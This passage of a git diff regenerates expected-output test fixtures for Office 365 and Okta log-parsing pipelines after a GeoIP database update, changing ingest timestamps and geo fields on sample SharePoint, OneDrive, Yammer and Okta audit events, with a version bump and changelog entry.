Owners\\u003c/Group\\u003e\",\"EventSource\":\"SharePoint\",\"Id\":\"56696ec0-5a7e-4561-5e88-08d7b3cacd4a\",\"ItemType\":\"Web\",\"ObjectId\":\"https://testsiem.sharepoint.com/sites/SIEMTest\",\"Operation\":\"AddedToGroup\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":14,\"Site\":\"9d58b52e-2adb-4976-8c1f-9932c32a8bd2\",\"SiteUrl\":\"https://testsiem.sharepoint.com/sites/SIEMTest\",\"TargetUserOrGroupName\":\"SHAREPOINT\\\\system\",\"TargetUserOrGroupType\":\"Member\",\"UserAgent\":\"\",\"UserId\":\"app@sharepoint\",\"UserKey\":\"i:0i.t|00000003-0000-0ff1-ce00-000000000000|app@sharepoint\",\"UserType\":0,\"Version\":1,\"WebId\":\"54cfe39c-0e16-4f8e-bd62-f2ac40248083\",\"Workload\":\"SharePoint\"}", "code": "SharePointSharingOperation", "provider": "SharePoint", @@ -187,7 +187,7 @@ }, "client": {}, "event": { - "ingested": "2021-12-09T13:42:49.545741900Z", + "ingested": "2021-12-14T14:49:46.421941955Z", "original": "{\"ClientIP\":\"\",\"CorrelationId\":\"4464369f-303c-b000-7cb1-c0cce4f2da18\",\"CreationTime\":\"2020-02-17T16:59:50\",\"EventData\":\"\\u003cGroup\\u003eSite Owners\\u003c/Group\\u003e\",\"EventSource\":\"SharePoint\",\"Id\":\"b8c880ff-e8fe-407c-9ce9-08d7b3cacd07\",\"ItemType\":\"Web\",\"ObjectId\":\"https://testsiem.sharepoint.com/sites/SIEMTest\",\"Operation\":\"AddedToGroup\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":14,\"Site\":\"9d58b52e-2adb-4976-8c1f-9932c32a8bd2\",\"SiteUrl\":\"https://testsiem.sharepoint.com/sites/SIEMTest\",\"TargetUserOrGroupName\":\"SIEMTest Owners\",\"TargetUserOrGroupType\":\"SecurityGroup\",\"UserAgent\":\"\",\"UserId\":\"app@sharepoint\",\"UserKey\":\"i:0i.t|00000003-0000-0ff1-ce00-000000000000|app@sharepoint\",\"UserType\":0,\"Version\":1,\"WebId\":\"54cfe39c-0e16-4f8e-bd62-f2ac40248083\",\"Workload\":\"SharePoint\"}", "code": "SharePointSharingOperation", "provider": "SharePoint", @@ -259,7 +259,7 @@ }, "client": {}, "event": { - "ingested": "2021-12-09T13:42:49.545747700Z", + "ingested": "2021-12-14T14:49:46.421942479Z", "original": "{\"ClientIP\":\"\",\"CorrelationId\":\"4464369f-303c-b000-7cb1-c0cce4f2da18\",\"CreationTime\":\"2020-02-17T16:59:50\",\"EventData\":\"\\u003cGroup\\u003eSite Members\\u003c/Group\\u003e\",\"EventSource\":\"SharePoint\",\"Id\":\"483f657f-9141-45fc-b141-08d7b3caccfb\",\"ItemType\":\"Web\",\"ObjectId\":\"https://testsiem.sharepoint.com/sites/SIEMTest\",\"Operation\":\"AddedToGroup\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":14,\"Site\":\"9d58b52e-2adb-4976-8c1f-9932c32a8bd2\",\"SiteUrl\":\"https://testsiem.sharepoint.com/sites/SIEMTest\",\"TargetUserOrGroupName\":\"SIEMTest Members\",\"TargetUserOrGroupType\":\"SecurityGroup\",\"UserAgent\":\"\",\"UserId\":\"app@sharepoint\",\"UserKey\":\"i:0i.t|00000003-0000-0ff1-ce00-000000000000|app@sharepoint\",\"UserType\":0,\"Version\":1,\"WebId\":\"54cfe39c-0e16-4f8e-bd62-f2ac40248083\",\"Workload\":\"SharePoint\"}", "code": "SharePointSharingOperation", "provider": "SharePoint", @@ -331,7 +331,7 @@ }, "client": {}, "event": { - "ingested": "2021-12-09T13:42:49.545752500Z", + "ingested": "2021-12-14T14:49:46.421942932Z", "original": "{\"ClientIP\":\"\",\"CorrelationId\":\"4464369f-303c-b000-7cb1-c0cce4f2da18\",\"CreationTime\":\"2020-02-17T16:59:49\",\"EventData\":\"\\u003cGroup\\u003eSite Owners\\u003c/Group\\u003e\",\"EventSource\":\"SharePoint\",\"Id\":\"13004a30-d15a-48a5-16ec-08d7b3caccc0\",\"ItemType\":\"Web\",\"ObjectId\":\"https://testsiem.sharepoint.com/sites/SIEMTest\",\"Operation\":\"AddedToGroup\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":14,\"Site\":\"9d58b52e-2adb-4976-8c1f-9932c32a8bd2\",\"SiteUrl\":\"https://testsiem.sharepoint.com/sites/SIEMTest\",\"TargetUserOrGroupName\":\"SHAREPOINT\\\\system\",\"TargetUserOrGroupType\":\"Member\",\"UserAgent\":\"\",\"UserId\":\"app@sharepoint\",\"UserKey\":\"i:0i.t|00000003-0000-0ff1-ce00-000000000000|app@sharepoint\",\"UserType\":0,\"Version\":1,\"WebId\":\"54cfe39c-0e16-4f8e-bd62-f2ac40248083\",\"Workload\":\"SharePoint\"}", "code": "SharePointSharingOperation", "provider": "SharePoint", @@ -362,6 +362,18 @@ }, { "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "ip": "67.43.156.13" }, "tags": [ @@ -415,7 +427,7 @@ "ip": "67.43.156.13" }, "event": { - "ingested": "2021-12-09T13:42:49.545757200Z", + "ingested": "2021-12-14T14:49:46.421943514Z", "original": "{\"ClientIP\":\"67.43.156.13\",\"CorrelationId\":\"fe71359f-005f-9000-7cb1-ccf5124703db\",\"CreationTime\":\"2020-02-14T18:25:45\",\"EventData\":\"\\u003ccopyRoleAssignments\\u003eFalse\\u003c/copyRoleAssignments\\u003e\\u003cclearSubScopes\\u003eFalse\\u003c/clearSubScopes\\u003e\",\"EventSource\":\"SharePoint\",\"Id\":\"dd162cd7-5df5-4fef-078a-08d7b17b4e95\",\"ItemType\":\"List\",\"ListId\":\"b108938d-3546-4359-925d-a1b54b4db8c2\",\"ObjectId\":\"https://testsiem-my.sharepoint.com/personal/asr_testsiem_onmicrosoft_com//personal/asr_testsiem_onmicrosoft_com/Sharing Links\",\"Operation\":\"SharingInheritanceBroken\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":14,\"Site\":\"d5180cfc-3479-44d6-b410-8c985ac894e3\",\"SiteUrl\":\"https://testsiem-my.sharepoint.com/personal/asr_testsiem_onmicrosoft_com\",\"SourceRelativeUrl\":\"Sharing Links\",\"UserAgent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:73.0) Gecko/20100101 Firefox/73.0\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"i:0h.f|membership|1003200096971f55@live.com\",\"UserType\":0,\"Version\":1,\"WebId\":\"8c5c94bb-8396-470c-87d7-8999f440cd30\",\"Workload\":\"OneDrive\"}", "code": "SharePointSharingOperation", "provider": "OneDrive", @@ -452,6 +464,18 @@ }, { "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "ip": "67.43.156.13" }, "tags": [ @@ -509,7 +533,7 @@ "ip": "67.43.156.13" }, "event": { - "ingested": "2021-12-09T13:42:49.545762400Z", + "ingested": "2021-12-14T14:49:46.421943981Z", "original": "{\"ClientIP\":\"67.43.156.13\",\"CorrelationId\":\"fe71359f-005f-9000-7cb1-ccf5124703db\",\"CreationTime\":\"2020-02-14T18:25:45\",\"EventData\":\"\\u003cType\\u003eEdit\\u003c/Type\\u003e\",\"EventSource\":\"SharePoint\",\"Id\":\"1cb54d72-3a76-4a7c-7b3d-08d7b17b4ec9\",\"ItemType\":\"File\",\"ListId\":\"2b6ad2bd-0fd7-4556-9c89-a97847085b85\",\"ListItemUniqueId\":\"7f06ab3a-bd98-41d3-a0b2-ad270d71e4d8\",\"ObjectId\":\"https://testsiem-my.sharepoint.com/personal/asr_testsiem_onmicrosoft_com/Documents/Screenshot.png\",\"Operation\":\"AnonymousLinkCreated\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":14,\"Site\":\"d5180cfc-3479-44d6-b410-8c985ac894e3\",\"SiteUrl\":\"https://testsiem-my.sharepoint.com/personal/asr_testsiem_onmicrosoft_com\",\"SourceFileExtension\":\"png\",\"SourceFileName\":\"Screenshot.png\",\"SourceRelativeUrl\":\"Documents/Screenshot.png\",\"UniqueSharingId\":\"d323b5ea-ceca-4d65-a628-e22ca9296a76\",\"UserAgent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:73.0) Gecko/20100101 Firefox/73.0\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"i:0h.f|membership|1003200096971f55@live.com\",\"UserType\":0,\"Version\":1,\"WebId\":\"8c5c94bb-8396-470c-87d7-8999f440cd30\",\"Workload\":\"OneDrive\"}", "code": "SharePointSharingOperation", "provider": "OneDrive", @@ -546,6 +570,18 @@ }, { "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "ip": "67.43.156.13" }, "tags": [ @@ -604,7 +640,7 @@ "ip": "67.43.156.13" }, "event": { - "ingested": "2021-12-09T13:42:49.545766900Z", + "ingested": "2021-12-14T14:49:46.421944431Z", "original": "{\"ClientIP\":\"67.43.156.13\",\"CorrelationId\":\"fe71359f-005f-9000-7cb1-ccf5124703db\",\"CreationTime\":\"2020-02-14T18:25:45\",\"EventData\":\"\\u003cPermissions granted\\u003eContribute\\u003c/Permissions granted\\u003e\",\"EventSource\":\"SharePoint\",\"Id\":\"a8c23ab8-9447-4824-3208-08d7b17b4e5e\",\"ItemType\":\"File\",\"ListId\":\"2b6ad2bd-0fd7-4556-9c89-a97847085b85\",\"ListItemUniqueId\":\"7f06ab3a-bd98-41d3-a0b2-ad270d71e4d8\",\"ObjectId\":\"https://testsiem-my.sharepoint.com/personal/asr_testsiem_onmicrosoft_com/Documents/Screenshot.png\",\"Operation\":\"SharingSet\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":14,\"Site\":\"d5180cfc-3479-44d6-b410-8c985ac894e3\",\"SiteUrl\":\"https://testsiem-my.sharepoint.com/personal/asr_testsiem_onmicrosoft_com\",\"SourceFileExtension\":\"png\",\"SourceFileName\":\"Screenshot.png\",\"SourceRelativeUrl\":\"Documents/Screenshot.png\",\"TargetUserOrGroupName\":\"SharingLinks.7f06ab3a-bd98-41d3-a0b2-ad270d71e4d8.AnonymousEdit.d323b5ea-ceca-4d65-a628-e22ca9296a76\",\"TargetUserOrGroupType\":\"SharePointGroup\",\"UserAgent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:73.0) Gecko/20100101 Firefox/73.0\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"i:0h.f|membership|1003200096971f55@live.com\",\"UserType\":0,\"Version\":1,\"WebId\":\"8c5c94bb-8396-470c-87d7-8999f440cd30\",\"Workload\":\"OneDrive\"}", "code": "SharePointSharingOperation", "provider": "OneDrive", @@ -641,6 +677,18 @@ }, { "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "ip": "67.43.156.13" }, "tags": [ @@ -699,7 +747,7 @@ "ip": "67.43.156.13" }, "event": { - "ingested": "2021-12-09T13:42:49.545772500Z", + "ingested": "2021-12-14T14:49:46.421944931Z", "original": "{\"ClientIP\":\"67.43.156.13\",\"CorrelationId\":\"fe71359f-005f-9000-7cb1-ccf5124703db\",\"CreationTime\":\"2020-02-14T18:25:44\",\"EventData\":\"\\u003cPermissions granted\\u003eLimited Access\\u003c/Permissions granted\\u003e\",\"EventSource\":\"SharePoint\",\"Id\":\"88a041e3-2f3a-483c-cf76-08d7b17b4e5b\",\"ItemType\":\"File\",\"ListId\":\"2b6ad2bd-0fd7-4556-9c89-a97847085b85\",\"ListItemUniqueId\":\"7f06ab3a-bd98-41d3-a0b2-ad270d71e4d8\",\"ObjectId\":\"https://testsiem-my.sharepoint.com/personal/asr_testsiem_onmicrosoft_com/Documents/Screenshot.png\",\"Operation\":\"SharingSet\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":14,\"Site\":\"d5180cfc-3479-44d6-b410-8c985ac894e3\",\"SiteUrl\":\"https://testsiem-my.sharepoint.com/personal/asr_testsiem_onmicrosoft_com\",\"SourceFileExtension\":\"png\",\"SourceFileName\":\"Screenshot.png\",\"SourceRelativeUrl\":\"Documents/Screenshot.png\",\"TargetUserOrGroupName\":\"Limited Access System Group\",\"TargetUserOrGroupType\":\"SharePointGroup\",\"UserAgent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:73.0) Gecko/20100101 Firefox/73.0\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"i:0h.f|membership|1003200096971f55@live.com\",\"UserType\":0,\"Version\":1,\"WebId\":\"8c5c94bb-8396-470c-87d7-8999f440cd30\",\"Workload\":\"OneDrive\"}", "code": "SharePointSharingOperation", "provider": "OneDrive", @@ -736,6 +784,18 @@ }, { "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "ip": "67.43.156.13" }, "tags": [ @@ -794,7 +854,7 @@ "ip": "67.43.156.13" }, "event": { - "ingested": "2021-12-09T13:42:49.545780600Z", + "ingested": "2021-12-14T14:49:46.421945488Z", "original": "{\"ClientIP\":\"67.43.156.13\",\"CorrelationId\":\"fe71359f-005f-9000-7cb1-ccf5124703db\",\"CreationTime\":\"2020-02-14T18:25:44\",\"EventData\":\"\\u003cPermissions granted\\u003eSystem.LimitedEdit\\u003c/Permissions granted\\u003e\",\"EventSource\":\"SharePoint\",\"Id\":\"98633e47-3540-4e8a-bcfc-08d7b17b4e48\",\"ItemType\":\"File\",\"ListId\":\"2b6ad2bd-0fd7-4556-9c89-a97847085b85\",\"ListItemUniqueId\":\"7f06ab3a-bd98-41d3-a0b2-ad270d71e4d8\",\"ObjectId\":\"https://testsiem-my.sharepoint.com/personal/asr_testsiem_onmicrosoft_com/Documents/Screenshot.png\",\"Operation\":\"SharingSet\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":14,\"Site\":\"d5180cfc-3479-44d6-b410-8c985ac894e3\",\"SiteUrl\":\"https://testsiem-my.sharepoint.com/personal/asr_testsiem_onmicrosoft_com\",\"SourceFileExtension\":\"png\",\"SourceFileName\":\"Screenshot.png\",\"SourceRelativeUrl\":\"Documents/Screenshot.png\",\"TargetUserOrGroupName\":\"4da1e7f54501bb99b6e0ab2ff8749842152ac02ff8c0c8017b0e40e6b67fecdd\",\"TargetUserOrGroupType\":\"SecurityGroup\",\"UserAgent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:73.0) Gecko/20100101 Firefox/73.0\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"i:0h.f|membership|1003200096971f55@live.com\",\"UserType\":0,\"Version\":1,\"WebId\":\"8c5c94bb-8396-470c-87d7-8999f440cd30\",\"Workload\":\"OneDrive\"}", "code": "SharePointSharingOperation", "provider": "OneDrive", diff --git a/packages/o365/data_stream/audit/_dev/test/pipeline/test-yammer-events.json-expected.json b/packages/o365/data_stream/audit/_dev/test/pipeline/test-yammer-events.json-expected.json index 29a6e5ba1cb..d558321b748 100644 --- a/packages/o365/data_stream/audit/_dev/test/pipeline/test-yammer-events.json-expected.json +++ b/packages/o365/data_stream/audit/_dev/test/pipeline/test-yammer-events.json-expected.json @@ -2,6 +2,18 @@ "expected": [ { "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "port": 12345, "ip": "67.43.156.13" }, @@ -50,7 +62,7 @@ "ip": "67.43.156.13" }, "event": { - "ingested": "2021-12-09T13:42:51.551520Z", + "ingested": "2021-12-14T14:49:48.538275519Z", "original": "{\"ActorUserId\":\"alice@testsiem2.onmicrosoft.com\",\"ActorYammerUserId\":36787265537,\"ClientIP\":\"67.43.156.13:12345\",\"CreationTime\":\"2020-02-28T09:42:45\",\"GroupName\":\"Sales\",\"Id\":\"2af7bbf1-d5d8-5cb0-8aca-f4ad8a087594\",\"ObjectId\":\"Sales\",\"Operation\":\"GroupCreation\",\"OrganizationId\":\"0e1dddce-163e-4b0b-9e33-87ba56ac4655\",\"RecordType\":22,\"ResultStatus\":\"TRUE\",\"UserId\":\"alice@testsiem2.onmicrosoft.com\",\"UserKey\":\"100320009d6edf94\",\"UserType\":0,\"Version\":1,\"Workload\":\"Yammer\",\"YammerNetworkId\":5846122497}", "code": "Yammer", "provider": "Yammer", @@ -128,7 +140,7 @@ "ip": "fdfd::555" }, "event": { - "ingested": "2021-12-09T13:42:51.551529300Z", + "ingested": "2021-12-14T14:49:48.538278327Z", "original": "{\"ActorUserId\":\"asr@testsiem2.onmicrosoft.com\",\"ActorYammerUserId\":36085768193,\"ClientIP\":\"[fdfd::555]:12346\",\"CreationTime\":\"2020-02-28T09:39:20\",\"GroupName\":\"Company group\",\"Id\":\"3f3e7f1c-84c1-55fc-9bb2-c8b8563eae06\",\"ObjectId\":\"Company group\",\"Operation\":\"GroupCreation\",\"OrganizationId\":\"0e1dddce-163e-4b0b-9e33-87ba56ac4655\",\"RecordType\":22,\"ResultStatus\":\"TRUE\",\"UserId\":\"asr@testsiem2.onmicrosoft.com\",\"UserKey\":\"100320009d292e16\",\"UserType\":0,\"Version\":1,\"Workload\":\"Yammer\",\"YammerNetworkId\":5846122497}", "code": "Yammer", "provider": "Yammer", diff --git a/packages/o365/manifest.yml b/packages/o365/manifest.yml index ee5f19a1765..5c5f2c07fc6 100644 --- a/packages/o365/manifest.yml +++ b/packages/o365/manifest.yml @@ -1,6 +1,6 @@ name: o365 title: Office 365 Logs -version: 1.3.1 +version: 1.3.2 release: ga description: Collect and parse event logs from Office 365 with Elastic Agent. type: integration diff --git a/packages/okta/changelog.yml b/packages/okta/changelog.yml index 4f334f788e1..f804110f744 100644 --- a/packages/okta/changelog.yml +++ b/packages/okta/changelog.yml @@ -1,4 +1,9 @@ # newer versions go on top +- version: "1.3.2" + changes: + - description: Regenerate test files using the new GeoIP database + type: bugfix + link: https://github.com/elastic/integrations/pull/2339 - version: "1.3.1" changes: - description: Change test public IPs to the supported subset diff --git a/packages/okta/data_stream/system/_dev/test/pipeline/test-okta-system-events.json-expected.json b/packages/okta/data_stream/system/_dev/test/pipeline/test-okta-system-events.json-expected.json index 4c6d7c3f506..9de77a0293a 100644 --- a/packages/okta/data_stream/system/_dev/test/pipeline/test-okta-system-events.json-expected.json +++ b/packages/okta/data_stream/system/_dev/test/pipeline/test-okta-system-events.json-expected.json @@ -1,33 +1,6 @@ { "expected": [ { - "source": { - "geo": { - "continent_name": "Asia", - "region_iso_code": "CN-JL", - "country_name": "China", - "region_name": "Jilin", - "location": { - "lon": 125.3228, - "lat": 43.88 - }, - "country_iso_code": "CN" - }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, - "user": { - "full_name": "xxxxxx", - "id": "00u1abvz4pYqdM8ms4x6" - }, - "ip": "175.16.199.1" - }, - "tags": [ - "preserve_original_event" - ], "@timestamp": "2020-02-14T22:18:51.843Z", "ecs": { "version": "1.12.0" @@ -56,8 +29,27 @@ }, "ip": "175.16.199.1" }, + "source": { + "geo": { + "continent_name": "Asia", + "region_iso_code": "CN-22", + "city_name": "Changchun", + "country_iso_code": "CN", + "country_name": "China", + "region_name": "Jilin Sheng", + "location": { + "lon": 125.3228, + "lat": 43.88 + } + }, + "user": { + "full_name": "xxxxxx", + "id": "00u1abvz4pYqdM8ms4x6" + }, + "ip": "175.16.199.1" + }, "event": { - "ingested": "2021-12-09T13:42:54.417340700Z", + "ingested": "2021-12-14T14:49:51.612964602Z", "original": "{\"actor\":{\"alternateId\":\"xxxxxx@elastic.co\",\"detailEntry\":null,\"displayName\":\"xxxxxx\",\"id\":\"00u1abvz4pYqdM8ms4x6\",\"type\":\"User\"},\"authenticationContext\":{\"authenticationProvider\":null,\"authenticationStep\":0,\"credentialProvider\":null,\"credentialType\":null,\"externalSessionId\":\"102nZHzd6OHSfGG51vsoc22gw\",\"interface\":null,\"issuer\":null},\"client\":{\"device\":\"Computer\",\"geographicalContext\":{\"city\":\"Dublin\",\"country\":\"United States\",\"geolocation\":{\"lat\":37.7201,\"lon\":-121.919},\"postalCode\":\"94568\",\"state\":\"California\"},\"id\":null,\"ipAddress\":\"175.16.199.1\",\"userAgent\":{\"browser\":\"FIREFOX\",\"os\":\"Mac OS X\",\"rawUserAgent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:72.0) Gecko/20100101 Firefox/72.0\"},\"zone\":\"null\"},\"debugContext\":{\"debugData\":{\"authnRequestId\":\"XkcAsWb8WjwDP76xh@1v8wAABp0\",\"requestId\":\"XkccyyMli2Uay2I93ZgRzQAAB0c\",\"requestUri\":\"/login/signout\",\"threatSuspected\":\"false\",\"url\":\"/login/signout?message=login_page_messages.session_has_expired\"}},\"displayMessage\":\"User logout from Okta\",\"eventType\":\"user.session.end\",\"legacyEventType\":\"core.user_auth.logout_success\",\"outcome\":{\"reason\":null,\"result\":\"SUCCESS\"},\"published\":\"2020-02-14T22:18:51.843Z\",\"request\":{\"ipChain\":[{\"geographicalContext\":{\"city\":\"Dublin\",\"country\":\"United States\",\"geolocation\":{\"lat\":37.7201,\"lon\":-121.919},\"postalCode\":\"94568\",\"state\":\"California\"},\"ip\":\"175.16.199.1\",\"source\":null,\"version\":\"V4\"}]},\"securityContext\":{\"asNumber\":null,\"asOrg\":null,\"domain\":null,\"isProxy\":null,\"isp\":null},\"severity\":\"INFO\",\"target\":null,\"transaction\":{\"detail\":{},\"id\":\"XkccyyMli2Uay2I93ZgRzQAAB0c\",\"type\":\"WEB\"},\"uuid\":\"faf7398a-4f77-11ea-97fb-5925e98228bd\",\"version\":\"0\"}\n{\"actor\":{\"alternateId\":\"xxxxxx@elastic.co\",\"detailEntry\":null,\"displayName\":\"xxxxxx\",\"id\":\"00u1abvz4pYqdM8ms4x6\",\"type\":\"User\"},\"authenticationContext\":{\"authenticationProvider\":null,\"authenticationStep\":0,\"credentialProvider\":null,\"credentialType\":null,\"externalSessionId\":\"102bZDNFfWaQSyEZQuDgWt-uQ\",\"interface\":null,\"issuer\":null},\"client\":{\"device\":\"Computer\",\"geographicalContext\":{\"city\":\"Dublin\",\"country\":\"United States\",\"geolocation\":{\"lat\":37.7201,\"lon\":-121.919},\"postalCode\":\"94568\",\"state\":\"California\"},\"id\":null,\"ipAddress\":\"175.16.199.1\",\"userAgent\":{\"browser\":\"FIREFOX\",\"os\":\"Mac OS X\",\"rawUserAgent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:72.0) Gecko/20100101 Firefox/72.0\"},\"zone\":\"null\"},\"debugContext\":{\"debugData\":{\"deviceFingerprint\":\"541daf91d15bef64a7e08c946fd9a9d0\",\"requestId\":\"XkcAsWb8WjwDP76xh@1v8wAABp0\",\"requestUri\":\"/api/v1/authn\",\"threatSuspected\":\"false\",\"url\":\"/api/v1/authn?\"}},\"displayMessage\":\"User login to Okta\",\"eventType\":\"user.session.start\",\"legacyEventType\":\"core.user_auth.login_success\",\"outcome\":{\"reason\":null,\"result\":\"SUCCESS\"},\"published\":\"2020-02-14T20:18:57.718Z\",\"request\":{\"ipChain\":[{\"geographicalContext\":{\"city\":\"Dublin\",\"country\":\"United States\",\"geolocation\":{\"lat\":37.7201,\"lon\":-121.919},\"postalCode\":\"94568\",\"state\":\"California\"},\"ip\":\"175.16.199.1\",\"source\":null,\"version\":\"V4\"}]},\"securityContext\":{\"asNumber\":null,\"asOrg\":null,\"domain\":null,\"isProxy\":null,\"isp\":null},\"severity\":\"INFO\",\"target\":null,\"transaction\":{\"detail\":{},\"id\":\"XkcAsWb8WjwDP76xh@1v8wAABp0\",\"type\":\"WEB\"},\"uuid\":\"3aeede38-4f67-11ea-abd3-1f5d113f2546\",\"version\":\"0\"}\n{\"actor\":{\"alternateId\":\"xxxxxx@elastic.co\",\"detailEntry\":null,\"displayName\":\"xxxxxx\",\"id\":\"00u1abvz4pYqdM8ms4x6\",\"type\":\"User\"},\"authenticationContext\":{\"authenticationProvider\":null,\"authenticationStep\":0,\"credentialProvider\":null,\"credentialType\":null,\"externalSessionId\":\"102bZDNFfWaQSyEZQuDgWt-uQ\",\"interface\":null,\"issuer\":null},\"client\":{\"device\":\"Computer\",\"geographicalContext\":{\"city\":\"Dublin\",\"country\":\"United States\",\"geolocation\":{\"lat\":37.7201,\"lon\":-121.919},\"postalCode\":\"94568\",\"state\":\"California\"},\"id\":null,\"ipAddress\":\"175.16.199.1\",\"userAgent\":{\"browser\":\"FIREFOX\",\"os\":\"Mac OS X\",\"rawUserAgent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:72.0) Gecko/20100101 Firefox/72.0\"},\"zone\":\"null\"},\"debugContext\":{\"debugData\":{\"deviceFingerprint\":\"541daf91d15bef64a7e08c946fd9a9d0\",\"requestId\":\"XkcAsWb8WjwDP76xh@1v8wAABp0\",\"requestUri\":\"/api/v1/authn\",\"threatSuspected\":\"false\",\"url\":\"/api/v1/authn?\"}},\"displayMessage\":\"Evaluation of sign-on policy\",\"eventType\":\"policy.evaluate_sign_on\",\"legacyEventType\":null,\"outcome\":{\"reason\":\"Sign-on policy evaluation resulted in ALLOW\",\"result\":\"ALLOW\"},\"published\":\"2020-02-14T20:18:57.762Z\",\"request\":{\"ipChain\":[{\"geographicalContext\":{\"city\":\"Dublin\",\"country\":\"United States\",\"geolocation\":{\"lat\":37.7201,\"lon\":-121.919},\"postalCode\":\"94568\",\"state\":\"California\"},\"ip\":\"175.16.199.1\",\"source\":null,\"version\":\"V4\"}]},\"securityContext\":{\"asNumber\":null,\"asOrg\":null,\"domain\":null,\"isProxy\":null,\"isp\":null},\"severity\":\"INFO\",\"target\":[{\"alternateId\":\"unknown\",\"detailEntry\":{\"policyType\":\"OktaSignOn\"},\"displayName\":\"Default Policy\",\"id\":\"00p1abvweGGDW10Ur4x6\",\"type\":\"PolicyEntity\"},{\"alternateId\":\"00p1abvweGGDW10Ur4x6\",\"detailEntry\":null,\"displayName\":\"Default Rule\",\"id\":\"0pr1abvwfqGFI4n064x6\",\"type\":\"PolicyRule\"}],\"transaction\":{\"detail\":{},\"id\":\"XkcAsWb8WjwDP76xh@1v8wAABp0\",\"type\":\"WEB\"},\"uuid\":\"3af594f9-4f67-11ea-abd3-1f5d113f2546\",\"version\":\"0\"}", "kind": "event", "action": "user.session.end", @@ -127,36 +119,12 @@ "name": "Mac" }, "version": "72.0." - } - }, - { - "source": { - "geo": { - "continent_name": "Asia", - "region_iso_code": "CN-JL", - "country_name": "China", - "region_name": "Jilin", - "location": { - "lon": 125.3228, - "lat": 43.88 - }, - "country_iso_code": "CN" - }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, - "user": { - "full_name": "xxxxxx", - "id": "00u1abvz4pYqdM8ms4x6" - }, - "ip": "175.16.199.1" }, "tags": [ "preserve_original_event" - ], + ] + }, + { "@timestamp": "2020-02-14T22:18:51.843Z", "ecs": { "version": "1.12.0" @@ -185,8 +153,27 @@ }, "ip": "175.16.199.1" }, + "source": { + "geo": { + "continent_name": "Asia", + "region_iso_code": "CN-22", + "city_name": "Changchun", + "country_iso_code": "CN", + "country_name": "China", + "region_name": "Jilin Sheng", + "location": { + "lon": 125.3228, + "lat": 43.88 + } + }, + "user": { + "full_name": "xxxxxx", + "id": "00u1abvz4pYqdM8ms4x6" + }, + "ip": "175.16.199.1" + }, "event": { - "ingested": "2021-12-09T13:42:54.417349900Z", + "ingested": "2021-12-14T14:49:51.612967594Z", "original": "{\"actor\":{\"alternateId\":\"xxxxxx@elastic.co\",\"detailEntry\":null,\"displayName\":\"xxxxxx\",\"id\":\"00u1abvz4pYqdM8ms4x6\",\"type\":\"User\"},\"authenticationContext\":{\"authenticationProvider\":null,\"authenticationStep\":0,\"credentialProvider\":null,\"credentialType\":null,\"externalSessionId\":\"102nZHzd6OHSfGG51vsoc22gw\",\"interface\":null,\"issuer\":null},\"client\":{\"device\":\"Computer\",\"geographicalContext\":{\"city\":\"Dublin\",\"country\":\"United States\",\"geolocation\":{\"lat\":37.7201,\"lon\":-121.919},\"postalCode\":\"94568\",\"state\":\"California\"},\"id\":null,\"ipAddress\":\"175.16.199.1\",\"userAgent\":{\"browser\":\"FIREFOX\",\"os\":\"Mac OS X\",\"rawUserAgent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:72.0) Gecko/20100101 